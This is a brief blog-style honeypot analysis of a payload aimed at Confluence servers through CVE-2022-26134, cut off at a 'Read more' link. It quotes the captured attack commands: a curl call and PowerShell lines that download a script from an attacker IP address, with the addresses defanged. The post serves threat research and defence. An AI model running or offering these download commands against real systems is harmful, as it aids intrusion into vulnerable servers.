CVE-2022-26134 – Honeypot Payload Analysis Example
Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:
HTTP Command Executes this:
curl http[:]//202.28.229.174/ap[.]sh?confcurl
This download the following (ap.sh)
$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing
$stealz.Content | Out-File ap.txt
Read more “CVE-2022-26134 – Honeypot Payload Analysis Example”